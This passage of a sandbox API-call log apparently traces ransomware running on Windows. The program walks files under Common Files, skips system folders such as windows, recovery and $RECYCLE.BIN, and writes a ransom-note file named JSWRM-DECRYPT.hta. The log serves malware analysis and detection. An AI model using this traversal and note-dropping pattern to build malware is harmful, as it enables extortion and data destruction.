(lpString1="msadds.dll", lpString2="system volume information") returned -1 [0069.214] lstrcmpiW (lpString1="msadds.dll", lpString2="msocache") returned -1 [0069.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadds.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadds.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadds.dll", lpUsedDefaultChar=0x0) returned 10 [0069.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadds.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadds.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadds.dll", lpUsedDefaultChar=0x0) returned 10 [0069.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0069.214] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44060e78, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x44060e78, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x44060e78, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msaddsr.dll", cAlternateFileName="")) returned 1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2=".") returned 1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2="..") returned 1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2="...") returned 1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2="windows") returned -1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2="recovery") returned -1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2="perflogs") returned -1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2="documents and settings") returned 1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2="system volume information") returned -1 [0069.214] lstrcmpiW (lpString1="msaddsr.dll", lpString2="msocache") returned -1 [0069.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaddsr.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaddsr.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msaddsr.dll", lpUsedDefaultChar=0x0) returned 11 [0069.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaddsr.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaddsr.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msaddsr.dll", lpUsedDefaultChar=0x0) returned 11 [0069.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.215] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d5b9b4, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d5b9b4, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d5b9b4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdaprsr.dll", cAlternateFileName="")) returned 1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2=".") returned 1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="..") returned 1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="...") returned 1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="windows") returned -1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="recovery") returned -1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="perflogs") returned -1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="documents and settings") returned 1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="system volume information") returned -1 [0069.215] lstrcmpiW (lpString1="msdaprsr.dll", lpString2="msocache") returned -1 [0069.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0069.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprsr.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprsr.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaprsr.dll", lpUsedDefaultChar=0x0) returned 12 [0069.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0069.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprsr.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprsr.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaprsr.dll", lpUsedDefaultChar=0x0) returned 12 [0069.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.215] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d5b9b4, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d5b9b4, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d5b9b4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x57000, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdaprst.dll", cAlternateFileName="")) returned 1 [0069.215] lstrcmpiW (lpString1="msdaprst.dll", lpString2=".") returned 1 [0069.215] lstrcmpiW (lpString1="msdaprst.dll", lpString2="..") returned 1 [0069.215] lstrcmpiW (lpString1="msdaprst.dll", lpString2="...") returned 1 [0069.215] lstrcmpiW (lpString1="msdaprst.dll", lpString2="windows") returned -1 [0069.215] lstrcmpiW (lpString1="msdaprst.dll", lpString2="recovery") returned -1 [0069.216] lstrcmpiW (lpString1="msdaprst.dll", lpString2="perflogs") returned -1 [0069.216] lstrcmpiW (lpString1="msdaprst.dll", lpString2="documents and settings") returned 1 [0069.216] lstrcmpiW (lpString1="msdaprst.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.216] lstrcmpiW (lpString1="msdaprst.dll", lpString2="system volume information") returned -1 [0069.216] lstrcmpiW (lpString1="msdaprst.dll", lpString2="msocache") returned -1 [0069.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprst.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprst.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaprst.dll", lpUsedDefaultChar=0x0) returned 12 [0069.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprst.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprst.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaprst.dll", lpUsedDefaultChar=0x0) returned 12 [0069.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.216] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44060e78, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x44060e78, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x44060e78, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x36200, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdarem.dll", cAlternateFileName="")) returned 1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2=".") returned 1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2="..") returned 1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2="...") returned 1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2="windows") returned -1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2="recovery") returned -1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2="perflogs") returned -1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2="documents and settings") returned 1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2="system volume information") returned -1 [0069.216] lstrcmpiW (lpString1="msdarem.dll", lpString2="msocache") returned -1 [0069.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdarem.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdarem.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdarem.dll", lpUsedDefaultChar=0x0) returned 11 [0069.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdarem.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdarem.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdarem.dll", lpUsedDefaultChar=0x0) returned 11 [0069.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.217] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4403ac10, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4403ac10, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4403ac10, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdaremr.dll", cAlternateFileName="")) returned 1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2=".") returned 1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2="..") returned 1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2="...") returned 1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2="windows") returned -1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2="recovery") returned -1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2="perflogs") returned -1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2="documents and settings") returned 1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2="system volume information") returned -1 [0069.217] lstrcmpiW (lpString1="msdaremr.dll", lpString2="msocache") returned -1 [0069.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaremr.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaremr.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaremr.dll", lpUsedDefaultChar=0x0) returned 12 [0069.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaremr.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaremr.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaremr.dll", lpUsedDefaultChar=0x0) returned 12 [0069.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.217] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdfmap.dll", cAlternateFileName="")) returned 1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2=".") returned 1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2="..") returned 1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2="...") returned 1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2="windows") returned -1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2="recovery") returned -1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2="perflogs") returned -1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2="documents and settings") returned 1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2="system volume information") returned -1 [0069.217] lstrcmpiW (lpString1="msdfmap.dll", lpString2="msocache") returned -1 [0069.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdfmap.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdfmap.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdfmap.dll", lpUsedDefaultChar=0x0) returned 11 [0069.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdfmap.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdfmap.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdfmap.dll", lpUsedDefaultChar=0x0) returned 11 [0069.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.218] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdfmap.dll", cAlternateFileName="")) returned 0 [0069.218] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0069.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0069.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.218] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2=".") returned 1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2="..") returned 1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2="...") returned 1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2="windows") returned -1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2="recovery") returned -1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2="perflogs") returned -1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2="documents and settings") returned 1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2="$RECYCLE.BIN") returned 1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2="system volume information") returned -1 [0069.218] lstrcmpiW (lpString1="Ole DB", lpString2="msocache") returned 1 [0069.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0069.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0069.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0069.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0069.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\jswrm-decrypt.hta")) returned 0xffffffff [0069.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0069.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0069.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0069.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0069.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\ole db\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0069.304] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.304] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0069.306] CloseHandle (hObject=0x298) returned 1 [0069.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0069.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0069.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0069.306] RtlAllocateHeap 